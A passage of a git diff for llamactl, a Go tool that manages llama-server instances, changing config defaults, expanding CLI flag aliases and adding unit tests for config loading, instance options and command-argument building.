diff --git a/pkg/config.go b/pkg/config.go index 12cac75..748492a 100644 --- a/pkg/config.go +++ b/pkg/config.go @@ -63,7 +63,7 @@ func LoadConfig(configPath string) (Config, error) { Instances: InstancesConfig{ PortRange: [2]int{8000, 9000}, LogDirectory: "/tmp/llamactl", - MaxInstances: 10, + MaxInstances: -1, // -1 means unlimited LlamaExecutable: "llama-server", DefaultAutoRestart: true, DefaultMaxRestarts: 3, @@ -120,7 +120,7 @@ func loadEnvVars(cfg *Config) { // Instance config if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" { - if ports := parsePortRange(portRange); ports != [2]int{0, 0} { + if ports := ParsePortRange(portRange); ports != [2]int{0, 0} { cfg.Instances.PortRange = ports } } @@ -152,8 +152,8 @@ func loadEnvVars(cfg *Config) { } } -// parsePortRange parses port range from string formats like "8000-9000" or "8000,9000" -func parsePortRange(s string) [2]int { +// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000" +func ParsePortRange(s string) [2]int { var parts []string // Try both separators @@ -227,7 +227,7 @@ func getDefaultConfigLocations() []string { // Additional system locations if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" { - for _, dir := range strings.Split(xdgConfigDirs, ":") { + for dir := range strings.SplitSeq(xdgConfigDirs, ":") { if dir != "" { locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml")) } diff --git a/pkg/config_test.go b/pkg/config_test.go new file mode 100644 index 0000000..32536ae --- /dev/null +++ b/pkg/config_test.go @@ -0,0 +1,346 @@ +package llamactl_test + +import ( + "os" + "path/filepath" + "testing" + + llamactl "llamactl/pkg" +) + +func TestLoadConfig_Defaults(t *testing.T) { + // Test loading config when no file exists and no env vars set + cfg, err := llamactl.LoadConfig("nonexistent-file.yaml") + if err != nil { + t.Fatalf("LoadConfig should not error with defaults: %v", err) + } + + // Verify default values + if cfg.Server.Host != "" { + t.Errorf("Expected default host to be empty, got %q", cfg.Server.Host) + } + if cfg.Server.Port != 8080 { + t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port) + } + if cfg.Instances.PortRange != [2]int{8000, 9000} { + t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange) + } + if cfg.Instances.LogDirectory != "/tmp/llamactl" { + t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory) + } + if cfg.Instances.MaxInstances != -1 { + t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances) + } + if cfg.Instances.LlamaExecutable != "llama-server" { + t.Errorf("Expected default executable 'llama-server', got %q", cfg.Instances.LlamaExecutable) + } + if !cfg.Instances.DefaultAutoRestart { + t.Error("Expected default auto restart to be true") + } + if cfg.Instances.DefaultMaxRestarts != 3 { + t.Errorf("Expected default max restarts 3, got %d", cfg.Instances.DefaultMaxRestarts) + } + if cfg.Instances.DefaultRestartDelay != 5 { + t.Errorf("Expected default restart delay 5, got %d", cfg.Instances.DefaultRestartDelay) + } +} + +func TestLoadConfig_FromFile(t *testing.T) { + // Create a temporary config file + tempDir := t.TempDir() + configFile := filepath.Join(tempDir, "test-config.yaml") + + configContent := ` +server: + host: "localhost" + port: 9090 +instances: + port_range: [7000, 8000] + log_directory: "/custom/logs" + max_instances: 5 + llama_executable: "/usr/bin/llama-server" + default_auto_restart: false + default_max_restarts: 10 + default_restart_delay: 30 +` + + err := os.WriteFile(configFile, []byte(configContent), 0644) + if err != nil { + t.Fatalf("Failed to write test config file: %v", err) + } + + cfg, err := llamactl.LoadConfig(configFile) + if err != nil { + t.Fatalf("LoadConfig failed: %v", err) + } + + // Verify values from file + if cfg.Server.Host != "localhost" { + t.Errorf("Expected host 'localhost', got %q", cfg.Server.Host) + } + if cfg.Server.Port != 9090 { + t.Errorf("Expected port 9090, got %d", cfg.Server.Port) + } + if cfg.Instances.PortRange != [2]int{7000, 8000} { + t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange) + } + if cfg.Instances.LogDirectory != "/custom/logs" { + t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory) + } + if cfg.Instances.MaxInstances != 5 { + t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances) + } + if cfg.Instances.LlamaExecutable != "/usr/bin/llama-server" { + t.Errorf("Expected executable '/usr/bin/llama-server', got %q", cfg.Instances.LlamaExecutable) + } + if cfg.Instances.DefaultAutoRestart { + t.Error("Expected auto restart to be false") + } + if cfg.Instances.DefaultMaxRestarts != 10 { + t.Errorf("Expected max restarts 10, got %d", cfg.Instances.DefaultMaxRestarts) + } + if cfg.Instances.DefaultRestartDelay != 30 { + t.Errorf("Expected restart delay 30, got %d", cfg.Instances.DefaultRestartDelay) + } +} + +func TestLoadConfig_EnvironmentOverrides(t *testing.T) { + // Set environment variables + envVars := map[string]string{ + "LLAMACTL_HOST": "0.0.0.0", + "LLAMACTL_PORT": "3000", + "LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000", + "LLAMACTL_LOG_DIR": "/env/logs", + "LLAMACTL_MAX_INSTANCES": "20", + "LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server", + "LLAMACTL_DEFAULT_AUTO_RESTART": "false", + "LLAMACTL_DEFAULT_MAX_RESTARTS": "7", + "LLAMACTL_DEFAULT_RESTART_DELAY": "15", + } + + // Set env vars and ensure cleanup + for key, value := range envVars { + os.Setenv(key, value) + defer os.Unsetenv(key) + } + + cfg, err := llamactl.LoadConfig("nonexistent-file.yaml") + if err != nil { + t.Fatalf("LoadConfig failed: %v", err) + } + + // Verify environment overrides + if cfg.Server.Host != "0.0.0.0" { + t.Errorf("Expected host '0.0.0.0', got %q", cfg.Server.Host) + } + if cfg.Server.Port != 3000 { + t.Errorf("Expected port 3000, got %d", cfg.Server.Port) + } + if cfg.Instances.PortRange != [2]int{5000, 6000} { + t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange) + } + if cfg.Instances.LogDirectory != "/env/logs" { + t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory) + } + if cfg.Instances.MaxInstances != 20 { + t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances) + } + if cfg.Instances.LlamaExecutable != "/env/llama-server" { + t.Errorf("Expected executable '/env/llama-server', got %q", cfg.Instances.LlamaExecutable) + } + if cfg.Instances.DefaultAutoRestart { + t.Error("Expected auto restart to be false") + } + if cfg.Instances.DefaultMaxRestarts != 7 { + t.Errorf("Expected max restarts 7, got %d", cfg.Instances.DefaultMaxRestarts) + } + if cfg.Instances.DefaultRestartDelay != 15 { + t.Errorf("Expected restart delay 15, got %d", cfg.Instances.DefaultRestartDelay) + } +} + +func TestLoadConfig_FileAndEnvironmentPrecedence(t *testing.T) { + // Create a temporary config file + tempDir := t.TempDir() + configFile := filepath.Join(tempDir, "test-config.yaml") + + configContent := ` +server: + host: "file-host" + port: 8888 +instances: + max_instances: 5 +` + + err := os.WriteFile(configFile, []byte(configContent), 0644) + if err != nil { + t.Fatalf("Failed to write test config file: %v", err) + } + + // Set some environment variables (should override file) + os.Setenv("LLAMACTL_HOST", "env-host") + os.Setenv("LLAMACTL_MAX_INSTANCES", "15") + defer os.Unsetenv("LLAMACTL_HOST") + defer os.Unsetenv("LLAMACTL_MAX_INSTANCES") + + cfg, err := llamactl.LoadConfig(configFile) + if err != nil { + t.Fatalf("LoadConfig failed: %v", err) + } + + // Environment should override file + if cfg.Server.Host != "env-host" { + t.Errorf("Expected env override 'env-host', got %q", cfg.Server.Host) + } + if cfg.Instances.MaxInstances != 15 { + t.Errorf("Expected env override 15, got %d", cfg.Instances.MaxInstances) + } + // File should override defaults + if cfg.Server.Port != 8888 { + t.Errorf("Expected file value 8888, got %d", cfg.Server.Port) + } +} + +func TestLoadConfig_InvalidYAML(t *testing.T) { + // Create a temporary config file with invalid YAML + tempDir := t.TempDir() + configFile := filepath.Join(tempDir, "invalid-config.yaml") + + invalidContent := ` +server: + host: "localhost" + port: not-a-number +instances: + [invalid yaml structure +` + + err := os.WriteFile(configFile, []byte(invalidContent), 0644) + if err != nil { + t.Fatalf("Failed to write test config file: %v", err) + } + + _, err = llamactl.LoadConfig(configFile) + if err == nil { + t.Error("Expected LoadConfig to return error for invalid YAML") + } +} + +func TestParsePortRange(t *testing.T) { + tests := []struct { + name string + input string + expected [2]int + }{ + {"hyphen format", "8000-9000", [2]int{8000, 9000}}, + {"comma format", "8000,9000", [2]int{8000, 9000}}, + {"with spaces", "8000 - 9000", [2]int{8000, 9000}}, + {"comma with spaces", "8000 , 9000", [2]int{8000, 9000}}, + {"single number", "8000", [2]int{0, 0}}, + {"invalid format", "not-a-range", [2]int{0, 0}}, + {"non-numeric", "start-end", [2]int{0, 0}}, + {"empty string", "", [2]int{0, 0}}, + {"too many parts", "8000-9000-10000", [2]int{0, 0}}, + {"negative numbers", "-1000--500", [2]int{0, 0}}, // Invalid parsing + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result := llamactl.ParsePortRange(tt.input) + if result != tt.expected { + t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected) + } + }) + } +} + +// Remove the getDefaultConfigLocations test entirely + +func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) { + // Test that environment variables are properly converted to correct types + testCases := []struct { + envVar string + envValue string + checkFn func(*llamactl.Config) bool + desc string + }{ + { + envVar: "LLAMACTL_PORT", + envValue: "invalid-port", + checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default + desc: "invalid port number should keep default", + }, + { + envVar: "LLAMACTL_MAX_INSTANCES", + envValue: "not-a-number", + checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default + desc: "invalid max instances should keep default", + }, + { + envVar: "LLAMACTL_DEFAULT_AUTO_RESTART", + envValue: "invalid-bool", + checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default + desc: "invalid boolean should keep default", + }, + { + envVar: "LLAMACTL_INSTANCE_PORT_RANGE", + envValue: "invalid-range", + checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default + desc: "invalid port range should keep default", + }, + } + + for _, tc := range testCases { + t.Run(tc.desc, func(t *testing.T) { + os.Setenv(tc.envVar, tc.envValue) + defer os.Unsetenv(tc.envVar) + + cfg, err := llamactl.LoadConfig("nonexistent-file.yaml") + if err != nil { + t.Fatalf("LoadConfig failed: %v", err) + } + + if !tc.checkFn(&cfg) { + t.Errorf("Test failed: %s", tc.desc) + } + }) + } +} + +func TestLoadConfig_PartialFile(t *testing.T) { + // Test that partial config files work correctly (missing sections should use defaults) + tempDir := t.TempDir() + configFile := filepath.Join(tempDir, "partial-config.yaml") + + // Only specify server config, instances should use defaults + configContent := ` +server: + host: "partial-host" + port: 7777 +` + + err := os.WriteFile(configFile, []byte(configContent), 0644) + if err != nil { + t.Fatalf("Failed to write test config file: %v", err) + } + + cfg, err := llamactl.LoadConfig(configFile) + if err != nil { + t.Fatalf("LoadConfig failed: %v", err) + } + + // Server config should be from file + if cfg.Server.Host != "partial-host" { + t.Errorf("Expected host 'partial-host', got %q", cfg.Server.Host) + } + if cfg.Server.Port != 7777 { + t.Errorf("Expected port 7777, got %d", cfg.Server.Port) + } + + // Instances config should be defaults + if cfg.Instances.PortRange != [2]int{8000, 9000} { + t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange) + } + if cfg.Instances.MaxInstances != -1 { + t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances) + } +} diff --git a/pkg/instance_test.go b/pkg/instance_test.go new file mode 100644 index 0000000..194645e --- /dev/null +++ b/pkg/instance_test.go @@ -0,0 +1,442 @@ +package llamactl_test + +import ( + "encoding/json" + "testing" + + llamactl "llamactl/pkg" +) + +func TestNewInstance(t *testing.T) { + globalSettings := &llamactl.InstancesConfig{ + LogDirectory: "/tmp/test", + DefaultAutoRestart: true, + DefaultMaxRestarts: 3, + DefaultRestartDelay: 5, + } + + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, + } + + instance := llamactl.NewInstance("test-instance", globalSettings, options) + + if instance.Name != "test-instance" { + t.Errorf("Expected name 'test-instance', got %q", instance.Name) + } + if instance.Running { + t.Error("New instance should not be running") + } + + // Check that options were properly set with defaults applied + opts := instance.GetOptions() + if opts.Model != "/path/to/model.gguf" { + t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) + } + if opts.Port != 8080 { + t.Errorf("Expected port 8080, got %d", opts.Port) + } + + // Check that defaults were applied + if opts.AutoRestart == nil || !*opts.AutoRestart { + t.Error("Expected AutoRestart to be true (default)") + } + if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 { + t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts) + } + if opts.RestartDelay == nil || *opts.RestartDelay != 5 { + t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay) + } +} + +func TestNewInstance_WithRestartOptions(t *testing.T) { + globalSettings := &llamactl.InstancesConfig{ + LogDirectory: "/tmp/test", + DefaultAutoRestart: true, + DefaultMaxRestarts: 3, + DefaultRestartDelay: 5, + } + + // Override some defaults + autoRestart := false + maxRestarts := 10 + restartDelay := 15 + + options := &llamactl.CreateInstanceOptions{ + AutoRestart: &autoRestart, + MaxRestarts: &maxRestarts, + RestartDelay: &restartDelay, + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + instance := llamactl.NewInstance("test-instance", globalSettings, options) + opts := instance.GetOptions() + + // Check that explicit values override defaults + if opts.AutoRestart == nil || *opts.AutoRestart { + t.Error("Expected AutoRestart to be false (overridden)") + } + if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 { + t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts) + } + if opts.RestartDelay == nil || *opts.RestartDelay != 15 { + t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay) + } +} + +func TestNewInstance_ValidationAndDefaults(t *testing.T) { + globalSettings := &llamactl.InstancesConfig{ + LogDirectory: "/tmp/test", + DefaultAutoRestart: true, + DefaultMaxRestarts: 3, + DefaultRestartDelay: 5, + } + + // Test with invalid negative values + invalidMaxRestarts := -5 + invalidRestartDelay := -10 + + options := &llamactl.CreateInstanceOptions{ + MaxRestarts: &invalidMaxRestarts, + RestartDelay: &invalidRestartDelay, + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + instance := llamactl.NewInstance("test-instance", globalSettings, options) + opts := instance.GetOptions() + + // Check that negative values were corrected to 0 + if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 { + t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts) + } + if opts.RestartDelay == nil || *opts.RestartDelay != 0 { + t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay) + } +} + +func TestSetOptions(t *testing.T) { + globalSettings := &llamactl.InstancesConfig{ + LogDirectory: "/tmp/test", + DefaultAutoRestart: true, + DefaultMaxRestarts: 3, + DefaultRestartDelay: 5, + } + + initialOptions := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, + } + + instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions) + + // Update options + newOptions := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/new-model.gguf", + Port: 8081, + }, + } + + instance.SetOptions(newOptions) + opts := instance.GetOptions() + + if opts.Model != "/path/to/new-model.gguf" { + t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model) + } + if opts.Port != 8081 { + t.Errorf("Expected updated port 8081, got %d", opts.Port) + } + + // Check that defaults are still applied + if opts.AutoRestart == nil || !*opts.AutoRestart { + t.Error("Expected AutoRestart to be true (default)") + } +} + +func TestSetOptions_NilOptions(t *testing.T) { + globalSettings := &llamactl.InstancesConfig{ + LogDirectory: "/tmp/test", + DefaultAutoRestart: true, + DefaultMaxRestarts: 3, + DefaultRestartDelay: 5, + } + + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + instance := llamactl.NewInstance("test-instance", globalSettings, options) + originalOptions := instance.GetOptions() + + // Try to set nil options + instance.SetOptions(nil) + + // Options should remain unchanged + currentOptions := instance.GetOptions() + if currentOptions.Model != originalOptions.Model { + t.Error("Options should not change when setting nil options") + } +} + +func TestGetProxy(t *testing.T) { + globalSettings := &llamactl.InstancesConfig{ + LogDirectory: "/tmp/test", + } + + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Host: "localhost", + Port: 8080, + }, + } + + instance := llamactl.NewInstance("test-instance", globalSettings, options) + + // Get proxy for the first time + proxy1, err := instance.GetProxy() + if err != nil { + t.Fatalf("GetProxy failed: %v", err) + } + if proxy1 == nil { + t.Error("Expected proxy to be created") + } + + // Get proxy again - should return cached version + proxy2, err := instance.GetProxy() + if err != nil { + t.Fatalf("GetProxy failed: %v", err) + } + if proxy1 != proxy2 { + t.Error("Expected cached proxy to be returned") + } +} + +func TestMarshalJSON(t *testing.T) { + globalSettings := &llamactl.InstancesConfig{ + LogDirectory: "/tmp/test", + DefaultAutoRestart: true, + DefaultMaxRestarts: 3, + DefaultRestartDelay: 5, + } + + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, + } + + instance := llamactl.NewInstance("test-instance", globalSettings, options) + + data, err := json.Marshal(instance) + if err != nil { + t.Fatalf("JSON marshal failed: %v", err) + } + + // Check that JSON contains expected fields + var result map[string]interface{} + err = json.Unmarshal(data, &result) + if err != nil { + t.Fatalf("JSON unmarshal failed: %v", err) + } + + if result["name"] != "test-instance" { + t.Errorf("Expected name 'test-instance', got %v", result["name"]) + } + if result["running"] != false { + t.Errorf("Expected running false, got %v", result["running"]) + } + + // Check that options are included + options_data, ok := result["options"] + if !ok { + t.Error("Expected options to be included in JSON") + } + options_map, ok := options_data.(map[string]interface{}) + if !ok { + t.Error("Expected options to be a map") + } + if options_map["model"] != "/path/to/model.gguf" { + t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"]) + } +} + +func TestUnmarshalJSON(t *testing.T) { + jsonData := `{ + "name": "test-instance", + "running": true, + "options": { + "model": "/path/to/model.gguf", + "port": 8080, + "auto_restart": false, + "max_restarts": 5 + } + }` + + var instance llamactl.Instance + err := json.Unmarshal([]byte(jsonData), &instance) + if err != nil { + t.Fatalf("JSON unmarshal failed: %v", err) + } + + if instance.Name != "test-instance" { + t.Errorf("Expected name 'test-instance', got %q", instance.Name) + } + if !instance.Running { + t.Error("Expected running to be true") + } + + opts := instance.GetOptions() + if opts == nil { + t.Fatal("Expected options to be set") + } + if opts.Model != "/path/to/model.gguf" { + t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) + } + if opts.Port != 8080 { + t.Errorf("Expected port 8080, got %d", opts.Port) + } + if opts.AutoRestart == nil || *opts.AutoRestart { + t.Error("Expected AutoRestart to be false") + } + if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 { + t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts) + } +} + +func TestUnmarshalJSON_PartialOptions(t *testing.T) { + jsonData := `{ + "name": "test-instance", + "running": false, + "options": { + "model": "/path/to/model.gguf" + } + }` + + var instance llamactl.Instance + err := json.Unmarshal([]byte(jsonData), &instance) + if err != nil { + t.Fatalf("JSON unmarshal failed: %v", err) + } + + opts := instance.GetOptions() + if opts.Model != "/path/to/model.gguf" { + t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) + } + + // Note: Defaults are NOT applied during unmarshaling + // They should only be applied by NewInstance or SetOptions + if opts.AutoRestart != nil { + t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)") + } +} + +func TestUnmarshalJSON_NoOptions(t *testing.T) { + jsonData := `{ + "name": "test-instance", + "running": false + }` + + var instance llamactl.Instance + err := json.Unmarshal([]byte(jsonData), &instance) + if err != nil { + t.Fatalf("JSON unmarshal failed: %v", err) + } + + if instance.Name != "test-instance" { + t.Errorf("Expected name 'test-instance', got %q", instance.Name) + } + if instance.Running { + t.Error("Expected running to be false") + } + + opts := instance.GetOptions() + if opts != nil { + t.Error("Expected options to be nil when not provided in JSON") + } +} + +func TestCreateInstanceOptionsValidation(t *testing.T) { + tests := []struct { + name string + maxRestarts *int + restartDelay *int + expectedMax int + expectedDelay int + }{ + { + name: "nil values", + maxRestarts: nil, + restartDelay: nil, + expectedMax: 0, // Should remain nil, but we can't easily test nil in this structure + expectedDelay: 0, + }, + { + name: "valid positive values", + maxRestarts: intPtr(10), + restartDelay: intPtr(30), + expectedMax: 10, + expectedDelay: 30, + }, + { + name: "zero values", + maxRestarts: intPtr(0), + restartDelay: intPtr(0), + expectedMax: 0, + expectedDelay: 0, + }, + { + name: "negative values should be corrected", + maxRestarts: intPtr(-5), + restartDelay: intPtr(-10), + expectedMax: 0, + expectedDelay: 0, + }, + } + + globalSettings := &llamactl.InstancesConfig{ + LogDirectory: "/tmp/test", + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + options := &llamactl.CreateInstanceOptions{ + MaxRestarts: tt.maxRestarts, + RestartDelay: tt.restartDelay, + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + instance := llamactl.NewInstance("test", globalSettings, options) + opts := instance.GetOptions() + + if tt.maxRestarts != nil { + if opts.MaxRestarts == nil { + t.Error("Expected MaxRestarts to be set") + } else if *opts.MaxRestarts != tt.expectedMax { + t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts) + } + } + + if tt.restartDelay != nil { + if opts.RestartDelay == nil { + t.Error("Expected RestartDelay to be set") + } else if *opts.RestartDelay != tt.expectedDelay { + t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay) + } + } + }) + } +} diff --git a/pkg/llama.go b/pkg/llama.go index 8d373d9..4180f73 100644 --- a/pkg/llama.go +++ b/pkg/llama.go @@ -180,7 +180,7 @@ type LlamaServerOptions struct { // UnmarshalJSON implements custom JSON unmarshaling to support multiple field names func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error { // First unmarshal into a map to handle multiple field names - var raw map[string]interface{} + var raw map[string]any if err := json.Unmarshal(data, &raw); err != nil { return err } @@ -199,61 +199,62 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error { // Handle alternative field names fieldMappings := map[string]string{ - // Threads alternatives - "t": "threads", - "tb": "threads_batch", - "threads-batch": "threads_batch", - - // Context size alternatives - "c": "ctx_size", - "ctx-size": "ctx_size", - - // Predict alternatives - "n": "predict", - "n-predict": "predict", - "n_predict": "predict", - - // Batch size alternatives - "b": "batch_size", - "batch-size": "batch_size", - - // GPU layers alternatives - "ngl": "gpu_layers", - "gpu-layers": "gpu_layers", - "n-gpu-layers": "gpu_layers", - "n_gpu_layers": "gpu_layers", - - // Model alternatives - "m": "model", - - // Seed alternatives - "s": "seed", - - // Flash attention alternatives - "fa": "flash_attn", - "flash-attn": "flash_attn", - - // Verbose alternatives - "v": "verbose", - "log-verbose": "verbose", - - // Verbosity alternatives - "lv": "verbosity", - "log-verbosity": "verbosity", - - // Temperature alternatives - "temp": "temperature", - - // Top-k alternatives - "top-k": "top_k", - - // Top-p alternatives - "top-p": "top_p", - - // Min-p alternatives - "min-p": "min_p", - - // Additional mappings can be added here + // Official llama-server short forms from the documentation + "t": "threads", // -t, --threads N + "tb": "threads_batch", // -tb, --threads-batch N + "C": "cpu_mask", // -C, --cpu-mask M + "Cr": "cpu_range", // -Cr, --cpu-range lo-hi + "Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M + "Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi + "c": "ctx_size", // -c, --ctx-size N + "n": "predict", // -n, --predict, --n-predict N + "b": "batch_size", // -b, --batch-size N + "ub": "ubatch_size", // -ub, --ubatch-size N + "fa": "flash_attn", // -fa, --flash-attn + "e": "escape", // -e, --escape + "dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache + "nkvo": "no_kv_offload", // -nkvo, --no-kv-offload + "ctk": "cache_type_k", // -ctk, --cache-type-k TYPE + "ctv": "cache_type_v", // -ctv, --cache-type-v TYPE + "dt": "defrag_thold", // -dt, --defrag-thold N + "np": "parallel", // -np, --parallel N + "dev": "device", // -dev, --device + "ot": "override_tensor", // --override-tensor, -ot + "ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N + "sm": "split_mode", // -sm, --split-mode + "ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,... + "mg": "main_gpu", // -mg, --main-gpu INDEX + "m": "model", // -m, --model FNAME + "mu": "model_url", // -mu, --model-url MODEL_URL + "hf": "hf_repo", // -hf, -hfr, --hf-repo + "hfr": "hf_repo", // -hf, -hfr, --hf-repo + "hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft + "hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft + "hff": "hf_file", // -hff, --hf-file FILE + "hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v + "hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v + "hffv": "hf_file_v", // -hffv, --hf-file-v FILE + "hft": "hf_token", // -hft, --hf-token TOKEN + "v": "verbose", // -v, --verbose, --log-verbose + "lv": "verbosity", // -lv, --verbosity, --log-verbosity N + "s": "seed", // -s, --seed SEED + "temp": "temperature", // --temp N + "l": "logit_bias", // -l, --logit-bias + "j": "json_schema", // -j, --json-schema SCHEMA + "jf": "json_schema_file", // -jf, --json-schema-file FILE + "sp": "special", // -sp, --special + "cb": "cont_batching", // -cb, --cont-batching + "nocb": "no_cont_batching", // -nocb, --no-cont-batching + "a": "alias", // -a, --alias STRING + "to": "timeout", // -to, --timeout N + "sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity + "cd": "ctx_size_draft", // -cd, --ctx-size-draft N + "devd": "device_draft", // -devd, --device-draft + "ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft + "md": "model_draft", // -md, --model-draft FNAME + "ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE + "ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE + "mv": "model_vocoder", // -mv, --model-vocoder FNAME } // Process alternative field names diff --git a/pkg/llama_test.go b/pkg/llama_test.go new file mode 100644 index 0000000..54cbebe --- /dev/null +++ b/pkg/llama_test.go @@ -0,0 +1,397 @@ +package llamactl_test + +import ( + "encoding/json" + "fmt" + "reflect" + "slices" + "testing" + + llamactl "llamactl/pkg" +) + +func TestBuildCommandArgs_BasicFields(t *testing.T) { + options := llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + Host: "localhost", + Verbose: true, + CtxSize: 4096, + GPULayers: 32, + } + + args := options.BuildCommandArgs() + + // Check individual arguments + expectedPairs := map[string]string{ + "--model": "/path/to/model.gguf", + "--port": "8080", + "--host": "localhost", + "--ctx-size": "4096", + "--gpu-layers": "32", + } + + for flag, expectedValue := range expectedPairs { + if !containsFlagWithValue(args, flag, expectedValue) { + t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args) + } + } + + // Check standalone boolean flag + if !contains(args, "--verbose") { + t.Errorf("Expected --verbose flag not found in %v", args) + } +} + +func TestBuildCommandArgs_BooleanFields(t *testing.T) { + tests := []struct { + name string + options llamactl.LlamaServerOptions + expected []string + excluded []string + }{ + { + name: "verbose true", + options: llamactl.LlamaServerOptions{ + Verbose: true, + }, + expected: []string{"--verbose"}, + }, + { + name: "verbose false", + options: llamactl.LlamaServerOptions{ + Verbose: false, + }, + excluded: []string{"--verbose"}, + }, + { + name: "multiple booleans", + options: llamactl.LlamaServerOptions{ + Verbose: true, + FlashAttn: true, + Mlock: false, + NoMmap: true, + }, + expected: []string{"--verbose", "--flash-attn", "--no-mmap"}, + excluded: []string{"--mlock"}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + args := tt.options.BuildCommandArgs() + + for _, expectedArg := range tt.expected { + if !contains(args, expectedArg) { + t.Errorf("Expected argument %q not found in %v", expectedArg, args) + } + } + + for _, excludedArg := range tt.excluded { + if contains(args, excludedArg) { + t.Errorf("Excluded argument %q found in %v", excludedArg, args) + } + } + }) + } +} + +func TestBuildCommandArgs_NumericFields(t *testing.T) { + options := llamactl.LlamaServerOptions{ + Port: 8080, + Threads: 4, + CtxSize: 2048, + GPULayers: 16, + Temperature: 0.7, + TopK: 40, + TopP: 0.9, + } + + args := options.BuildCommandArgs() + + expectedPairs := map[string]string{ + "--port": "8080", + "--threads": "4", + "--ctx-size": "2048", + "--gpu-layers": "16", + "--temperature": "0.7", + "--top-k": "40", + "--top-p": "0.9", + } + + for flag, expectedValue := range expectedPairs { + if !containsFlagWithValue(args, flag, expectedValue) { + t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args) + } + } +} + +func TestBuildCommandArgs_ZeroValues(t *testing.T) { + options := llamactl.LlamaServerOptions{ + Port: 0, // Should be excluded + Threads: 0, // Should be excluded + Temperature: 0, // Should be excluded + Model: "", // Should be excluded + Verbose: false, // Should be excluded + } + + args := options.BuildCommandArgs() + + // Zero values should not appear in arguments + excludedArgs 